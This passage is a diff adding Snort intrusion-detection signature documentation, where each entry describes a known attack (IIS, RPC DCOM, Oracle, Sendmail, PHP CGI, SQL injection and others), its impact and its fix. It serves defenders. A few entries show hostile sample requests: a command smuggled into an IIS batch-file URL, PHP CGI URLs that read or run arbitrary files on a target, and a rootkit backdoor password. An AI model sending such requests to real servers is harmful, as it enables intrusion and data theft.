@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+3193
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Internet Information Server.
+
+--
+Impact:
+Serious. Code execution leading to unauthorized administrative access
+on the target host.
+
+--
+Detailed Information:
+Microsoft IIS contains a programming error that may allow an attacker to
+execute commands of their choosing on a vulnerable system. If a valid
+request for an executable file on the system is made, the server will
+honor the request and execute any commands sent to the system. It may be
+possible for an attacker to execute system commands sent to cmd.exe or
+an executable batch file (.bat) for example.
+
+--
+Affected Systems:
+	Microsoft IIS 4.0
+	Microsoft IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can send a request to an executable file on the system and
+supply command arguments of their choice to the file. The server will
+honor the request and execute the attackers commands.
+
+For example, http://www.target.com/scripts/cmd.bat"+&+somecommand
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2009.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2009
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to connect 
+to a CVS repository containing code not publicly available.
+
+--
+Detailed Information:
+This rule detects attempts to connect to a CVS repository that fail due 
+indicate determined activity by an attacker to gain unauthorized access 
+to the CVS respository.
+
+The source code of software in the repository may be compromised by a 
+succesful attacker who could gain access to source code not intended for
+public viewing.
+
+For CVS daemons running under changed root conditions (chroot), the rest
+of the operating system files may be protected.
+
+--
+Affected Systems:
+	All versions of CVS
+	
+--
+Attack Scenarios:
+This may be an intelligence gathering activity or an attempt to log in 
+to a CVS repository that is not intended to be publicly available.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+It is possible that an authorized user may mis-type the repository name.
+
+--
+False Negatives:
+Connections to the server using zlib compression will not generate this
+event.
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous access to the cvs server where appropriate.
+
+Maintain checks on the password database and the CVS repository logs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVS:
+http://www.cvshome.org/docs/
+
+--
--- /dev/null
+++ b/doc/signatures/100000332.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000332
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Artmedic Newsletter" application running on a webserver. Access to the file "log.php" using a remote file being passed as the "email" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "email" parameter in the "log.php" script used by the "Artmedic Newsletter" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Artmedic Newsletter
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3164.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3164
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2811.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2811
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2917.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2917
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure switch_snapshot_master
+. This procedure is included in
+sys.dbms_repcat_sna_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1773.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+1773
+
+--
+Summary:
+This event is generated when an attempt is made to access the executable file php.exe.
+
+--
+Impact:
+Severe - File execution and File access, due to a configuration error
+
+--
+Detailed Information:
+Apache servers can use the keyword "ScriptAlias" to create virtual folders. This is used to install PHP CGI (ScriptAlias /php/ "c:/php/"). 
+PHP version prior to an including 4.3.0 do not correctly check user input to this file. The executable php.exe can now be used to execute any file (even on different partitions) on the target host.
+
+
+--
+Affected Systems:
+PHP versions 4.3.0 and prior used on Apache web servers for windows.
+
+--
+Attack Scenarios:
+Read file: http://[targethost]/php/php.exe?c:\filetoread
+Execute file: http://[targethost]/php/php.exe?c:\filetoexecute
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+If the PHP version is newer than 4.3.0 this vulnerability can not be exploited.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Update PHP to the latest non affected version from www.php.net
+
+If the php.ini configuration file contains the keyword cgi.force_redirect this vulnerability can not be exploited.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/332.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 332
+
+-- 
+
+Summary: 
+An intelligence gathering attack against the finger daemon
+
+-- 
+
+Impact:
+The attacker may obtain information about user accounts on the target system.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use a finger command against a host with a username of "0".  A finger query against a vulnerable finger daemon may allow the attacker to obtain a list of accounts on the target system with some details for each account where present (such as time and source of the last login). 
+
+Obtaining a list of accounts might precipitate further attacks such as password guessing, email attacks and other abuse.
+
+--
+
+Attack Scenarios:
+An attacker learns that the "sys" account exists on the system. He then proceeds to guess the password and is then able to gain remote access to the system.
+
+-- 
+
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS378
+http://www.whitehats.com/info/IDS131
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0197
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10069%20(Finger%20zero%20at%20host
+
+--
--- /dev/null
+++ b/doc/signatures/2268.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2268
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-12.html
+
+--
--- /dev/null
+++ b/doc/signatures/918.txt
@@ -0,0 +1,62 @@
+SID:
+918
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/365.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+365
+
+--
+Summary:
+This event is generated when an external user pings an internal server using an echo request ICMP type. This may indicate an attempt to scan the network or cause a denial of service using a "ping flood." 
+
+--
+Impact:
+Possible information gathering or denial of service attempt. 
+
+--
+Detailed Information:
+An ICMP ping may indicate a scanning attempt, a ping flood, or a remote user attempting to see if the network responds.
+
+--
+Affected Systems:
+Any system that responds to a ping request.
+
+--
+Attack Scenarios:
+An attacker can use a scanner that pings a system to find out more information about the network, or the attacker can use a tool to send a large number of pings in an attempt to "flood" the network and create a denial of service condition.
+
+--
+Ease of Attack:
+Simple. Scanning and ping-based DoS tools are freely available.
+
+--
+False Positives:
+This rule will generate an alert if a legitimate remote user pings an internal server.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a packet filtering firewall to block ICMP ping packets with an ICMP type value of 8.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3143.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3143
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000421.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000421
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Igloo" application running on a webserver. Access to the file "wiki.php" using a remote file being passed as the "c_node[class_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "c_node[class_path]" parameter in the "wiki.php" script used by the "Igloo" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Igloo
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1823.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1823
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1513.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1513
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1578.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1578
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2806.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2806
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure set_local_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3249.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3249
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3169.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3169
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/219.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+219
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "StoogR". This is a known password for 
+the HidePak rootkit.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000821.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000821
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VBZooM" application running on a webserver. Access to the file "sub-join.php" with SQL commands being passed as the "UserID" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "UserID" parameter in the "sub-join.php" script used by the "VBZooM" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZooM
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/711.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+711
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a flaw in SGI IRIX's telnetd.
+
+--
+Impact:
+Serious. Arbitrary code execution. Possible remote root compromise of 
+the host.
+
+--
+Detailed Information:
+When setting one of the _RDL environment variables, IRIX's telnetd logs 
+the information via syslog. When telnetd calls syslog, it is possible to
+manipulate the variable to overwrite values on the stack so that code 
+given is executed as the user telnetd is run as, typically root.
+
+--
+Affected Systems:
